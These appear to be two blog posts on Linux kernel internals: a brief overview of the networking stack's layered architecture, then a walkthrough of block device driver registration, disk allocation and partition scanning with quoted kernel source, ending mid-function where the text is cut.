Linux’s networking is originated from the BSD’s socket just like most of the Unix-like operating system, this is called TCP/IP protocol. The TCP/IP protocol stack contains four layer in concept. The top-most is application layer , then trasport layer , next IP layer and finally the data link layer. Linux networking protocol stack is very complicated, this article will just talk about the general architecture. The following articles will contain more details though I don’t how much there will be.

As we know, there are lots of protocols in the kernel and also there are lots of physical network card in the world. The linux need to abstract the common code and also the special code for every protocol and device. So the function pointer is in everywhere of network subsystem, and actually in everywhere of Linux kernel. Follwing pic shows the Linux core network architecture.

  +--------------------------+
  |   system call interface  |
  +--------------------------+


+------------------------------+
| protocol agnostic interface  |
+------------------------------+


+------------------------------+
|       network protocols      |
+------+------+-------+--------+
|      |      |       |        |
| inet | dccp | sctp  | packet |
|      |      |       |        |
+------+------+-------+--------+


+------------------------------+
| device agnostic interface    |
+------------------------------+


+------------------------------+
|       device drivers         |
+------+------+-------+--------+
|      |      |       |        |
|e1000 | virtio vmxnet|  ...   |
|      |      |       |        |
+------+------+-------+--------+

System call inteface

Easy to understand, all the Unix-like operating system have the same system call interface. The socket, bind, listen, accept, connect and some other system call are all available in all operating system. Also the socket is abstracted as a file descriptor and the usespace interact with the kernel with this fd. The

protocol agnostic interface

This is the struct ‘sock’, as the struct ‘socket’ connect with the VFS(fd) for the userspace, the ‘sock’ connects with the following protocols.

network protocols

Here defines a lot of network protocols, for example the IPV4 protocol stacks, the ipx, irda and the other directory in linux/net directory. And for every network protocol stack, there are a ‘family’ for example the ipv4 is ‘inet_family_ops’. In the initialization, the kernel will add some protocols in the family, for example TCP/UDP.

device agnostic interface

This layer connects the protocols to the various network devices. This contains the common interface for example the device driver can register the network card device using ‘register_netdevice’, also it can send packet using ‘dev_queue_xmit’. They are all not related with a specific protocol and specific network device.

device driver

This layer is the physical networkcard device that does the finally send/receiver packet work. There are lots of network device driver in linux/drivers/net directory.

The next articles will discuss this general picture in more details. Stay hungry, stay foolish.

reference

Anatomy of the Linux networking stack

Anatomy of the Linux block device driver

2018-06-14T00:00:00+00:00

In linux device driver, the block device is different from the char device which one we have discussed before. In this article we will discuss the block device driver.

block subsystem initialization

Block subsystem is initialized in ‘genhd_device_init’ function.

static int __init genhd_device_init(void)
{
  int error;

  block_class.dev_kobj = sysfs_dev_block_kobj;
  error = class_register(&block_class);
  if (unlikely(error))
    return error;
  bdev_map = kobj_map_init(base_probe, &block_class_lock);
  blk_dev_init();

  register_blkdev(BLOCK_EXT_MAJOR, "blkext");

  /* create top-level block dir */
  if (!sysfs_deprecated)
    block_depr = kobject_create_and_add("block", NULL);
  return 0;
}

‘block_class’ will indicate the ‘/dev/block’ directory. ‘bdev_map’ is a ‘struct kobj_map’ which we has discussed in the char device driver. Initialization work seems quite simple.

register block device’s number

int register_blkdev(unsigned int major, const char *name)
{
  struct blk_major_name **n, *p;
  int index, ret = 0;

  mutex_lock(&block_class_lock);

  /* temporary */
  if (major == 0) {
    for (index = ARRAY_SIZE(major_names)-1; index > 0; index--) {
    if (major_names[index] == NULL)
      break;
    }

    if (index == 0) {
    printk("register_blkdev: failed to get major for %s\n",
            name);
    ret = -EBUSY;
    goto out;
    }
    major = index;
    ret = major;
  }

  p = kmalloc(sizeof(struct blk_major_name), GFP_KERNEL);
  if (p == NULL) {
    ret = -ENOMEM;
    goto out;
  }

  p->major = major;
  strlcpy(p->name, name, sizeof(p->name));
  p->next = NULL;
  index = major_to_index(major);

  for (n = &major_names[index]; *n; n = &(*n)->next) {
    if ((*n)->major == major)
    break;
  }
  if (!*n)
    *n = p;
  else
    ret = -EBUSY;

  if (ret < 0) {
    printk("register_blkdev: cannot get major %d for %s\n",
          major, name);
    kfree(p);
  }
  out:
  mutex_unlock(&block_class_lock);
  return ret;
  }

  static struct blk_major_name {
  struct blk_major_name *next;
  int major;
  char name[16];
} *major_names[BLKDEV_MAJOR_HASH_SIZE];

‘register_blkdev’ is very like ‘register_chrdev_region’ just except the former uses ‘major_names’. ‘register_blkdev’ is used to manage the block device major number.

block_device

‘block_device ‘ represent a logic block device.

struct block_device {
  dev_t   bd_dev;  /* not a kdev_t - it's a search key */
  int   bd_openers;
  struct inode *  bd_inode; /* will die */
  struct super_block * bd_super;
  struct mutex  bd_mutex; /* open/close mutex */
  struct list_head bd_inodes;
  void *   bd_claiming;
  void *   bd_holder;
  int   bd_holders;
  bool   bd_write_holder;
  #ifdef CONFIG_SYSFS
  struct list_head bd_holder_disks;
  #endif
  struct block_device * bd_contains;
  unsigned  bd_block_size;
  struct hd_struct * bd_part;
  /* number of times partitions within this device have been opened. */
  unsigned  bd_part_count;
  int   bd_invalidated;
  struct gendisk * bd_disk;
  struct request_queue *  bd_queue;
  struct list_head bd_list;
  /*
  * Private data.  You must have bd_claim'ed the block_device
  * to use this.  NOTE:  bd_claim allows an owner to claim
  * the same device multiple times, the owner must take special
  * care to not mess up bd_private for that case.
  */
  unsigned long  bd_private;

  /* The counter of freeze processes */
  int   bd_fsfreeze_count;
  /* Mutex for freeze */
  struct mutex  bd_fsfreeze_mutex;
};

This struct not only can represent a complete logical device, and also can represent a partition in a logical block device.If it is for a complete block device, the ‘bd_part’ represents this device’s partition info. if it is for a partition, the ‘bd_contains’ indicates the block device which belongs to. When a block device or its partition has been open, the kernel will create a ‘block_device’, we will discuss later. ‘block_device’ is used for connecting the virtual file system and block device driver, so the block device driver has little chance to control it. ‘block_device’ is often used with the ‘bdev’ file system.

struct gendisk

struct gendisk represents a real disk. It is allocated and controled by the block device driver.

struct gendisk {
  /* major, first_minor and minors are input parameters only,
  * don't use directly.  Use disk_devt() and disk_max_parts().
  */
  int major;   /* major number of driver */
  int first_minor;
  int minors;                     /* maximum number of minors, =1 for
                                          * disks that can't be partitioned. */

  char disk_name[DISK_NAME_LEN]; /* name of major driver */
  char *(*devnode)(struct gendisk *gd, umode_t *mode);

  unsigned int events;  /* supported events */
  unsigned int async_events; /* async events, subset of all */

  /* Array of pointers to partitions indexed by partno.
  * Protected with matching bdev lock but stat and other
  * non-critical accesses use RCU.  Always access through
  * helpers.
  */
  struct disk_part_tbl __rcu *part_tbl;
  struct hd_struct part0;

  const struct block_device_operations *fops;
  struct request_queue *queue;
  void *private_data;

  int flags;
  struct device *driverfs_dev;  // FIXME: remove
  struct kobject *slave_dir;

  struct timer_rand_state *random;
  atomic_t sync_io;  /* RAID */
  struct disk_events *ev;
  #ifdef  CONFIG_BLK_DEV_INTEGRITY
  struct blk_integrity *integrity;
  #endif
  int node_id;
};

‘minors’ indicates the max minor device, if it is one, we can’t make partition for this block device.

‘disk_part_tbl’ represents the disk’s partition table info, in his field, the ‘part’ represents the partitions.

‘queue’ represents the I/O request in this block device.

‘part0’ indicates the first partition, if no partition it represent the whole device.

The block device driver has to allocate gendisk and initialize the field in it. gendisk can represent a partitioned disk or no partition disk, when the driver calls’ ‘add_disk’ to add it to system, the kernel will decide whether scan this partition info.

struct hd_struct

‘hd_struct’ represents a partition info in a block device.

struct hd_struct {
  sector_t start_sect;
  /*
  * nr_sects is protected by sequence counter. One might extend a
  * partition while IO is happening to it and update of nr_sects
  * can be non-atomic on 32bit machines with 64bit sector_t.
  */
  sector_t nr_sects;
  seqcount_t nr_sects_seq;
  sector_t alignment_offset;
  unsigned int discard_alignment;
  struct device __dev;
  struct kobject *holder_dir;
  int policy, partno;
  struct partition_meta_info *info;
  #ifdef CONFIG_FAIL_MAKE_REQUEST
  int make_it_fail;
  #endif
  unsigned long stamp;
  atomic_t in_flight[2];
  #ifdef CONFIG_SMP
  struct disk_stats __percpu *dkstats;
  #else
  struct disk_stats dkstats;
  #endif
  atomic_t ref;
  struct rcu_head rcu_head;
};

‘start_sect’, ‘nr_sects’ and ‘parto’ represen this partition’s start sector, number of sectors and partition number. The ‘__dev’ means a partition will be considered as a device.

alloc_disk

‘alloc_disk’ can be used to allocate a gendisk struct and also do some initialization.

struct gendisk *alloc_disk(int minors)
{
  return alloc_disk_node(minors, NUMA_NO_NODE);
}

struct gendisk *alloc_disk_node(int minors, int node_id)
{
    struct gendisk *disk;

    disk = kzalloc_node(sizeof(struct gendisk), GFP_KERNEL, node_id);
    if (disk) {
      if (!init_part_stats(&disk->part0)) {
      kfree(disk);
      return NULL;
      }
      disk->node_id = node_id;
      if (disk_expand_part_tbl(disk, 0)) {
      free_part_stats(&disk->part0);
      kfree(disk);
      return NULL;
      }
      disk->part_tbl->part[0] = &disk->part0;

      /*
      * set_capacity() and get_capacity() currently don't use
      * seqcounter to read/update the part0->nr_sects. Still init
      * the counter as we can read the sectors in IO submission
      * patch using seqence counters.
      *
      * TODO: Ideally set_capacity() and get_capacity() should be
      * converted to make use of bd_mutex and sequence counters.
      */
      seqcount_init(&disk->part0.nr_sects_seq);
      hd_ref_init(&disk->part0);

      disk->minors = minors;
      rand_initialize_disk(disk);
      disk_to_dev(disk)->class = &block_class;
      disk_to_dev(disk)->type = &disk_type;
      device_initialize(disk_to_dev(disk));
    }
    return disk;
}

int disk_expand_part_tbl(struct gendisk *disk, int partno)
{
    struct disk_part_tbl *old_ptbl = disk->part_tbl;
    struct disk_part_tbl *new_ptbl;
    int len = old_ptbl ? old_ptbl->len : 0;
    int target = partno + 1;
    size_t size;
    int i;

    /* disk_max_parts() is zero during initialization, ignore if so */
    if (disk_max_parts(disk) && target > disk_max_parts(disk))
      return -EINVAL;

    if (target <= len)
      return 0;

    size = sizeof(*new_ptbl) + target * sizeof(new_ptbl->part[0]);
    new_ptbl = kzalloc_node(size, GFP_KERNEL, disk->node_id);
    if (!new_ptbl)
      return -ENOMEM;

    new_ptbl->len = target;

    for (i = 0; i < len; i++)
      rcu_assign_pointer(new_ptbl->part[i], old_ptbl->part[i]);

    disk_replace_part_tbl(disk, new_ptbl);
    return 0;
}

The argument of ‘alloc_disk’ minors indicates the max partition of this disk can have. Tough work is done in ‘alloc_disk_node’. ‘disk_expand_part_tbl’ is to allocate the gendisk’s part_tbl field and then assigned the gendisk’s part0 to disk->part_tbl->part[0]. part0 is a hd_struct and also can represent a whole disk device. Finally ‘alloc_disk’ will do the trivial work that the device driver model requires.

add_disk

After allocating the gendisk and do some initialization, we need add the gendisk to system. This is done by ‘add_disk’ function.

void add_disk(struct gendisk *disk)
{
    struct backing_dev_info *bdi;
    dev_t devt;
    int retval;

    /* minors == 0 indicates to use ext devt from part0 and should
    * be accompanied with EXT_DEVT flag.  Make sure all
    * parameters make sense.
    */
    WARN_ON(disk->minors && !(disk->major || disk->first_minor));
    WARN_ON(!disk->minors && !(disk->flags & GENHD_FL_EXT_DEVT));

    disk->flags |= GENHD_FL_UP;

    retval = blk_alloc_devt(&disk->part0, &devt);
    if (retval) {
      WARN_ON(1);
      return;
    }
    disk_to_dev(disk)->devt = devt;

    /* ->major and ->first_minor aren't supposed to be
    * dereferenced from here on, but set them just in case.
    */
    disk->major = MAJOR(devt);
    disk->first_minor = MINOR(devt);

    disk_alloc_events(disk);

    /* Register BDI before referencing it from bdev */
    bdi = &disk->queue->backing_dev_info;
    bdi_register_dev(bdi, disk_devt(disk));

    blk_register_region(disk_devt(disk), disk->minors, NULL,
          exact_match, exact_lock, disk);
    register_disk(disk);
    blk_register_queue(disk);

    /*
    * Take an extra ref on queue which will be put on disk_release()
    * so that it sticks around as long as @disk is there.
    */
    WARN_ON_ONCE(!blk_get_queue(disk->queue));

    retval = sysfs_create_link(&disk_to_dev(disk)->kobj, &bdi->dev->kobj,
          "bdi");
    WARN_ON(retval);

    disk_add_events(disk);
}

In block device, the major number represent the device driver and the minor number represent a partition of the device driver manages. ‘blk_alloc_devt’ generates the block device device number. ‘blk_register_region’ is a very important function as it adds the block device to the system just like the char does. Insert the devt to global variable ‘bdev_map’. Next is ‘register_disk’:

static void register_disk(struct gendisk *disk)
{
    struct device *ddev = disk_to_dev(disk);
    struct block_device *bdev;
    struct disk_part_iter piter;
    struct hd_struct *part;
    int err;

    ddev->parent = disk->driverfs_dev;

    dev_set_name(ddev, "%s", disk->disk_name);

    /* delay uevents, until we scanned partition table */
    dev_set_uevent_suppress(ddev, 1);

    if (device_add(ddev))
      return;
    if (!sysfs_deprecated) {
      err = sysfs_create_link(block_depr, &ddev->kobj,
        kobject_name(&ddev->kobj));
      if (err) {
      device_del(ddev);
      return;
      }
}

    /*
    * avoid probable deadlock caused by allocating memory with
    * GFP_KERNEL in runtime_resume callback of its all ancestor
    * devices
    */
    pm_runtime_set_memalloc_noio(ddev, true);

    disk->part0.holder_dir = kobject_create_and_add("holders", &ddev->kobj);
    disk->slave_dir = kobject_create_and_add("slaves", &ddev->kobj);

    /* No minors to use for partitions */
    if (!disk_part_scan_enabled(disk))
      goto exit;

    /* No such device (e.g., media were just removed) */
    if (!get_capacity(disk))
      goto exit;

    bdev = bdget_disk(disk, 0);
    if (!bdev)
      goto exit;

    bdev->bd_invalidated = 1;
    err = blkdev_get(bdev, FMODE_READ, NULL);
    if (err < 0)
      goto exit;
    blkdev_put(bdev, FMODE_READ);

    exit:
    /* announce disk after possible partitions are created */
    dev_set_uevent_suppress(ddev, 0);
    kobject_uevent(&ddev->kobj, KOBJ_ADD);

    /* announce possible partitions */
    disk_part_iter_init(&piter, disk, 0);
    while ((part = disk_part_iter_next(&piter)))
      kobject_uevent(&part_to_dev(part)->kobj, KOBJ_ADD);
    disk_part_iter_exit(&piter);
}

The first part is to do the device model operation. Most important is ‘device_add’, after this function, there will be a /dev/xx, /dev/ramhda for example. ‘disk_part_scan_enabled’ will return false if this disk can’t be partitioned and ‘register_disk’ wil exit. If it can, go ahead. ‘bdget_disk’ will get a ‘block_device’ this is a very important struct

struct block_device *bdget_disk(struct gendisk *disk, int partno)
{
    struct hd_struct *part;
    struct block_device *bdev = NULL;

    part = disk_get_part(disk, partno);
    if (part)
      bdev = bdget(part_devt(part));
    disk_put_part(part);

    return bdev;
}
EXPORT_SYMBOL(bdget_disk);

struct block_device *bdget(dev_t dev)
{
    struct block_device *bdev;
    struct inode *inode;

    inode = iget5_locked(blockdev_superblock, hash(dev),
      bdev_test, bdev_set, &dev);

    if (!inode)
      return NULL;

    bdev = &BDEV_I(inode)->bdev;

    if (inode->i_state & I_NEW) {
      bdev->bd_contains = NULL;
      bdev->bd_super = NULL;
      bdev->bd_inode = inode;
      bdev->bd_block_size = (1 << inode->i_blkbits);
      bdev->bd_part_count = 0;
      bdev->bd_invalidated = 0;
      inode->i_mode = S_IFBLK;
      inode->i_rdev = dev;
      inode->i_bdev = bdev;
      inode->i_data.a_ops = &def_blk_aops;
      mapping_set_gfp_mask(&inode->i_data, GFP_USER);
      inode->i_data.backing_dev_info = &default_backing_dev_info;
      spin_lock(&bdev_lock);
      list_add(&bdev->bd_list, &all_bdevs);
      spin_unlock(&bdev_lock);
      unlock_new_inode(inode);
    }
    return bdev;
}

struct inode *iget5_locked(struct super_block *sb, unsigned long hashval,
  int (*test)(struct inode *, void *),
  int (*set)(struct inode *, void *), void *data)
{
    struct hlist_head *head = inode_hashtable + hash(sb, hashval);
    struct inode *inode;

    spin_lock(&inode_hash_lock);
    inode = find_inode(sb, head, test, data);
    spin_unlock(&inode_hash_lock);

    if (inode) {
      wait_on_inode(inode);
      return inode;
    }

    inode = alloc_inode(sb);
    if (inode) {
      struct inode *old;

      spin_lock(&inode_hash_lock);
      /* We released the lock, so.. */
      old = find_inode(sb, head, test, data);
      if (!old) {
      if (set(inode, data))
        goto set_failed;

      spin_lock(&inode->i_lock);
      inode->i_state = I_NEW;
      hlist_add_head(&inode->i_hash, head);
      spin_unlock(&inode->i_lock);
      inode_sb_list_add(inode);
      spin_unlock(&inode_hash_lock);

      /* Return the locked inode with I_NEW set, the
      * caller is responsible for filling in the contents
      */
      return inode;
      }

      /*
      * Uhhuh, somebody else created the same inode under
      * us. Use the old inode instead of the one we just
      * allocated.
      */
      spin_unlock(&inode_hash_lock);
      destroy_inode(inode);
      inode = old;
      wait_on_inode(inode);
    }
    return inode;

    set_failed:
    spin_unlock(&inode_hash_lock);
    destroy_inode(inode);
    return NULL;
}

Here ‘iget5_locked’ uses the global variable ‘blockdev_superblock’ as the superblock and will finally call blockdev_superblock->s_op->alloc_inode, this actually is ‘bdev_alloc_inode’.

static struct inode *bdev_alloc_inode(struct super_block *sb)
{
    struct bdev_inode *ei = kmem_cache_alloc(bdev_cachep, GFP_KERNEL);
    if (!ei)
      return NULL;
    return &ei->vfs_inode;
}

struct bdev_inode {
    struct block_device bdev;
    struct inode vfs_inode;
};

From this we know, ‘iget5_locked’ return a inode in a ‘bdev_inode’ struct and from this inode, we can actually get the ‘block_device’ field ‘bdev’. In ‘iget5_locked’, it calls ‘bdev_set’, this set the ‘bdev.bd_dev’ to the disk’s device number.

static int bdev_set(struct inode *inode, void *data)
{
    BDEV_I(inode)->bdev.bd_dev = *(dev_t *)data;
    return 0;
}

After get the ‘block_device’, ‘register_disk’ set ‘bdev->bd_invalidated’ to 1, this give the kernel chance to scan this disk again. Next is to call ‘blkdev_get’, it actually calls ‘__blkdev_get’.

int blkdev_get(struct block_device *bdev, fmode_t mode, void *holder)
{
    struct block_device *whole = NULL;
    int res;

    WARN_ON_ONCE((mode & FMODE_EXCL) && !holder);

    if ((mode & FMODE_EXCL) && holder) {
      whole = bd_start_claiming(bdev, holder);
      if (IS_ERR(whole)) {
      bdput(bdev);
      return PTR_ERR(whole);
      }
    }

    res = __blkdev_get(bdev, mode, 0);

    if (whole) {
      struct gendisk *disk = whole->bd_disk;

      /* finish claiming */
      mutex_lock(&bdev->bd_mutex);
      spin_lock(&bdev_lock);

      if (!res) {
      BUG_ON(!bd_may_claim(bdev, whole, holder));
      /*
      * Note that for a whole device bd_holders
      * will be incremented twice, and bd_holder
      * will be set to bd_may_claim before being
      * set to holder
      */
      whole->bd_holders++;
      whole->bd_holder = bd_may_claim;
      bdev->bd_holders++;
      bdev->bd_holder = holder;
      }

      /* tell others that we're done */
      BUG_ON(whole->bd_claiming != holder);
      whole->bd_claiming = NULL;
      wake_up_bit(&whole->bd_claiming, 0);

      spin_unlock(&bdev_lock);

      /*
      * Block event polling for write claims if requested.  Any
      * write holder makes the write_holder state stick until
      * all are released.  This is good enough and tracking
      * individual writeable reference is too fragile given the
      * way @mode is used in blkdev_get/put().
      */
      if (!res && (mode & FMODE_WRITE) && !bdev->bd_write_holder &&
          (disk->flags & GENHD_FL_BLOCK_EVENTS_ON_EXCL_WRITE)) {
      bdev->bd_write_holder = true;
      disk_block_events(disk);
      }

      mutex_unlock(&bdev->bd_mutex);
      bdput(whole);
    }

    return res;
}

‘__blkdev_get’ is very long. Here we wil go to the first path, as it first calls :

static int __blkdev_get(struct block_device *bdev, fmode_t mode, int for_part)
{
    struct gendisk *disk;
    struct module *owner;
    int ret;
    int partno;
    int perm = 0;

    ...

    ret = -ENXIO;
    disk = get_gendisk(bdev->bd_dev, &partno);
    if (!disk)
      goto out;
    owner = disk->fops->owner;

    disk_block_events(disk);
    mutex_lock_nested(&bdev->bd_mutex, for_part);
    if (!bdev->bd_openers) {
      bdev->bd_disk = disk;
      bdev->bd_queue = disk->queue;
      bdev->bd_contains = bdev;
      if (!partno) {
      struct backing_dev_info *bdi;

      ret = -ENXIO;
      bdev->bd_part = disk_get_part(disk, partno);
      if (!bdev->bd_part)
        goto out_clear;

      ret = 0;
      if (disk->fops->open) {
        ret = disk->fops->open(bdev, mode);
        if (ret == -ERESTARTSYS) {
        /* Lost a race with 'disk' being
        * deleted, try again.
        * See md.c
        */
        disk_put_part(bdev->bd_part);
        bdev->bd_part = NULL;
        bdev->bd_disk = NULL;
        bdev->bd_queue = NULL;
        mutex_unlock(&bdev->bd_mutex);
        disk_unblock_events(disk);
        put_disk(disk);
        module_put(owner);
        goto restart;
        }
      }

      if (!ret) {
        bd_set_size(bdev,(loff_t)get_capacity(disk)<<9);
        bdi = blk_get_backing_dev_info(bdev);
        if (bdi == NULL)
        bdi = &default_backing_dev_info;
        bdev_inode_switch_bdi(bdev->bd_inode, bdi);
      }

      /*
      * If the device is invalidated, rescan partition
      * if open succeeded or failed with -ENOMEDIUM.
      * The latter is necessary to prevent ghost
      * partitions on a removed medium.
      */
      if (bdev->bd_invalidated) {
        if (!ret)
        rescan_partitions(disk, bdev);
        else if (ret == -ENOMEDIUM)
        invalidate_partitions(disk, bdev);
      }
      if (ret)
        goto out_clear;
      } 
      ...
    bdev->bd_openers++;
    if (for_part)
      bdev->bd_part_count++;
    mutex_unlock(&bdev->bd_mutex);
    disk_unblock_events(disk);
    return 0;

    out_clear:
    disk_put_part(bdev->bd_part);
    bdev->bd_disk = NULL;
    bdev->bd_part = NULL;
    bdev->bd_queue = NULL;
    bdev_inode_switch_bdi(bdev->bd_inode, &default_backing_dev_info);
    if (bdev != bdev->bd_contains)
      __blkdev_put(bdev->bd_contains, mode, 1);
    bdev->bd_contains = NULL;
    out_unlock_bdev:
    mutex_unlock(&bdev->bd_mutex);
    disk_unblock_events(disk);
    put_disk(disk);
    module_put(owner);
    out:
    bdput(bdev);

    return ret;
}

First get the gendisk, here we see the device number bdev->bd_dev’s usage. Later, set some of the field of bdev, and ‘bdev->bd_part’ points to ‘disk->part0’. Then calls ‘disk->fops->open(bdev, mode);’. Later important function is ‘rescan_partitions’:

int rescan_partitions(struct gendisk *disk, struct block_device *bdev)
{
  struct parsed_partitions *state = NULL;
  struct hd_struct *part;
  int p, highest, res;
  rescan:
  if (state && !IS_ERR(state)) {
    free_partitions(state);
    state = NULL;
  }

  res = drop_partitions(disk, bdev);
  if (res)
    return res;

  if (disk->fops->revalidate_disk)
    disk->fops->revalidate_disk(disk);
  check_disk_size_change(disk, bdev);
  bdev->bd_invalidated = 0;
  if (!get_capacity(disk) || !(state = check_partition(disk, bdev)))
    return 0;
  if (IS_ERR(state)) {
    /*
    * I/O error reading the partition table.  If any
    * partition code tried to read beyond EOD, retry
    * after unlocking native capacity.
    */
    if (PTR_ERR(state) == -ENOSPC) {
    printk(KERN_WARNING "%s: partition table beyond EOD, ",
            disk->disk_name);
    if (disk_unlock_native_capacity(disk))
      goto rescan;
    }
    return -EIO;
  }
  /*
  * If any partition code tried to read beyond EOD, try
  * unlocking native capacity even if partition table is
  * successfully read as we could be missing some partitions.
  */
  if (state->access_beyond_eod) {
    printk(KERN_WARNING
          "%s: partition table partially beyond EOD, ",
          disk->disk_name);
    if (disk_unlock_native_capacity(disk))
    goto rescan;
  }

  /* tell userspace that the media / partition table may have changed */
  kobject_uevent(&disk_to_dev(disk)->kobj, KOBJ_CHANGE);

  /* Detect the highest partition number and preallocate
  * disk->part_tbl.  This is an optimization and not strictly
  * necessary.
  */
  for (p = 1, highest = 0; p < state->limit; p++)
    if (state->parts[p].size)
    highest = p;

  disk_expand_part_tbl(disk, highest);

  /* add partitions */
  for (p = 1; p < state->limit; p++) {
    sector_t size, from;
    struct partition_meta_info *info = NULL;

    size = state->parts[p].size;
    if (!size)
    continue;

    from = state->parts[p].from;
    if (from >= get_capacity(disk)) {
    printk(KERN_WARNING
            "%s: p%d start %llu is beyond EOD, ",
            disk->disk_name, p, (unsigned long long) from);
    if (disk_unlock_native_capacity(disk))
      goto rescan;
    continue;
    }

    if (from + size > get_capacity(disk)) {
    printk(KERN_WARNING
            "%s: p%d size %llu extends beyond EOD, ",
            disk->disk_name, p, (unsigned long long) size);

    if (disk_unlock_native_capacity(disk)) {
      /* free state and restart */
      goto rescan;
    } else {
      /*
      * we can not ignore partitions of broken tables
      * created by for example camera firmware, but
      * we limit them to the end of the disk to avoid
      * creating invalid block devices
      */
      size = get_capacity(disk) - from;
    }
    }

    if (state->parts[p].has_info)
    info = &state->parts[p].info;
    part = add_partition(disk, p, from, size,
          state->parts[p].flags,
          &state->parts[p].info);
    if (IS_ERR(part)) {
    printk(KERN_ERR " %s: p%d could not be added: %ld\n",
            disk->disk_name, p, -PTR_ERR(part));
    continue;
    }
  #ifdef CONFIG_BLK_DEV_MD
    if (state->parts[p].flags & ADDPART_FLAG_RAID)
    md_autodetect_dev(part_to_dev(part)->devt);
  #endif
  }
  free_partitions(state);
  return 0;
}

It calls ‘check_partition’. Every partition recognition function is in the globa variable ‘check_part’, if there is no partition in disk, it will print ‘unknown partition table’. How about if there are partitions in this disk. It will call ‘disk_expand_part_tbl’ to expand ‘gendisk->part_tbl’. Then call ‘add_partition’ to add partition device to the system.

struct hd_struct *add_partition(struct gendisk *disk, int partno,
    sector_t start, sector_t len, int flags,
    struct partition_meta_info *info)
{
    struct hd_struct *p;
    dev_t devt = MKDEV(0, 0);
    struct device *ddev = disk_to_dev(disk);
    struct device *pdev;
    struct disk_part_tbl *ptbl;
    const char *dname;
    int err;

    err = disk_expand_part_tbl(disk, partno);
    if (err)
      return ERR_PTR(err);
    ptbl = disk->part_tbl;

    if (ptbl->part[partno])
      return ERR_PTR(-EBUSY);

    p = kzalloc(sizeof(*p), GFP_KERNEL);
    if (!p)
      return ERR_PTR(-EBUSY);

    if (!init_part_stats(p)) {
      err = -ENOMEM;
      goto out_free;
    }

    seqcount_init(&p->nr_sects_seq);
    pdev = part_to_dev(p);

    p->start_sect = start;
    p->alignment_offset =
      queue_limit_alignment_offset(&disk->queue->limits, start);
    p->discard_alignment =
      queue_limit_discard_alignment(&disk->queue->limits, start);
    p->nr_sects = len;
    p->partno = partno;
    p->policy = get_disk_ro(disk);

    if (info) {
      struct partition_meta_info *pinfo = alloc_part_info(disk);
      if (!pinfo)
      goto out_free_stats;
      memcpy(pinfo, info, sizeof(*info));
      p->info = pinfo;
    }

    dname = dev_name(ddev);
    if (isdigit(dname[strlen(dname) - 1]))
      dev_set_name(pdev, "%sp%d", dname, partno);
    else
      dev_set_name(pdev, "%s%d", dname, partno);

    device_initialize(pdev);
    pdev->class = &block_class;
    pdev->type = &part_type;
    pdev->parent = ddev;

    err = blk_alloc_devt(p, &devt);
    if (err)
      goto out_free_info;
    pdev->devt = devt;

    /* delay uevent until 'holders' subdir is created */
    dev_set_uevent_suppress(pdev, 1);
    err = device_add(pdev);
    if (err)
      goto out_put;

    err = -ENOMEM;
    p->holder_dir = kobject_create_and_add("holders", &pdev->kobj);
    if (!p->holder_dir)
      goto out_del;

    dev_set_uevent_suppress(pdev, 0);
    if (flags & ADDPART_FLAG_WHOLEDISK) {
      err = device_create_file(pdev, &dev_attr_whole_disk);
      if (err)
      goto out_del;
    }

    /* everything is up and running, commence */
    rcu_assign_pointer(ptbl->part[partno], p);

    /* suppress uevent if the disk suppresses it */
    if (!dev_get_uevent_suppress(ddev))
      kobject_uevent(&pdev->kobj, KOBJ_ADD);

    hd_ref_init(p);
    return p;

    out_free_info:
    free_part_info(p);
    out_free_stats:
    free_part_stats(p);
    out_free:
    kfree(p);
    return ERR_PTR(err);
    out_del:
    kobject_put(p->holder_dir);
    device_del(pdev);
    out_put:
    put_device(pdev);
    blk_free_devt(devt);
    return ERR_PTR(err);
}

First allocate a ‘hd_struct’ to contain this partition infomation. Kernel take every partition as a seprate device, so for every ‘add_partition’ will call ‘device_add’ to add partition to system and generate a directory in /dev/, such as /dev/ramhda1, /dev/ramhda2. Notice tehre is no ‘block_device’ for partition.

After call ‘register_disk’ in ‘add_disk’, it calls ‘blk_register_queue’. This function initialize the disk’s request queue.

int blk_register_queue(struct gendisk *disk)
{
    int ret;
    struct device *dev = disk_to_dev(disk);
    struct request_queue *q = disk->queue;

    if (WARN_ON(!q))
      return -ENXIO;

    /*
    * Initialization must be complete by now.  Finish the initial
    * bypass from queue allocation.
    */
    blk_queue_bypass_end(q);
    queue_flag_set_unlocked(QUEUE_FLAG_INIT_DONE, q);

    ret = blk_trace_init_sysfs(dev);
    if (ret)
      return ret;

    ret = kobject_add(&q->kobj, kobject_get(&dev->kobj), "%s", "queue");
    if (ret < 0) {
      blk_trace_remove_sysfs(dev);
      return ret;
    }

    kobject_uevent(&q->kobj, KOBJ_ADD);

    if (q->mq_ops)
      blk_mq_register_disk(disk);

    if (!q->request_fn)
      return 0;

    ret = elv_register_queue(q);
    if (ret) {
      kobject_uevent(&q->kobj, KOBJ_REMOVE);
      kobject_del(&q->kobj);
      blk_trace_remove_sysfs(dev);
      kobject_put(&dev->kobj);
      return ret;
    }

    return 0;
}

Though it seems that this queue is related to the device requests, here we just see its initialization is doing something with the standard device model.

So after ‘add_disk’ add the disk to system. The following struct has been created.

                                      block_de^ice
                                      +---------------+ <--+
+--------------------------------------+  bd_part      |    |
|                                      +---------------+    |
|            +-------------------------+  bd_disk      |    |
|            |                         +---------------+    |
|            |                         |  bd_contains  +----+
|            |                         +---------------|
|            |                         |bd_iinvalidated=0
|            |                         +---------------+
|            |                         |bd_openers=1   |
|            |                         +---------------+
|            |
|            |
|            |
|            |
|            v
|               gendisk
|            +-------------------+
|            |                   |
|            +-------------------+              disk_part_tbl
|            |   *part_tbl       +------------> +---------------+
|            +-------------------+              |               |
|            |                   |              +---------------+
|            |                   |              |    len        |
|            |                   |              +---------------+
|            |                   |              |               |
|            |                   |              +---------------+
+--------->  +-------------------+ <------------+    *part[0]   |
  part0      |   start_sect      |              +---------------+            hd_struct
            +-------------------+              |    *part[1]   +----------> +---------------+
            |   nr_sects        |              +---------------+            | start_sect    |
            +-------------------+                                           +---------------+
            |   __dev           |                                           | nr_sects      |
            +-------------------+                                           +---------------+
            |    partno=0       |                                           |  partno=1     |
            +-------------------+                                           +---------------+
            |                   |                                           |               |
            |                   |                                           +---------------+
            |                   |
            |                   |
            +-------------------+

open block device

When we add devices to system, a node in /dev/ will be created, this is done in ‘devtmpfs_create_node’. This node is created by the devtmpfs and when create the inode, ‘init_special_inode’ will be called.

void init_special_inode(struct inode *inode, umode_t mode, dev_t rdev)
{
    inode->i_mode = mode;
    if (S_ISCHR(mode)) {
      inode->i_fop = &def_chr_fops;
      inode->i_rdev = rdev;
    } else if (S_ISBLK(mode)) {
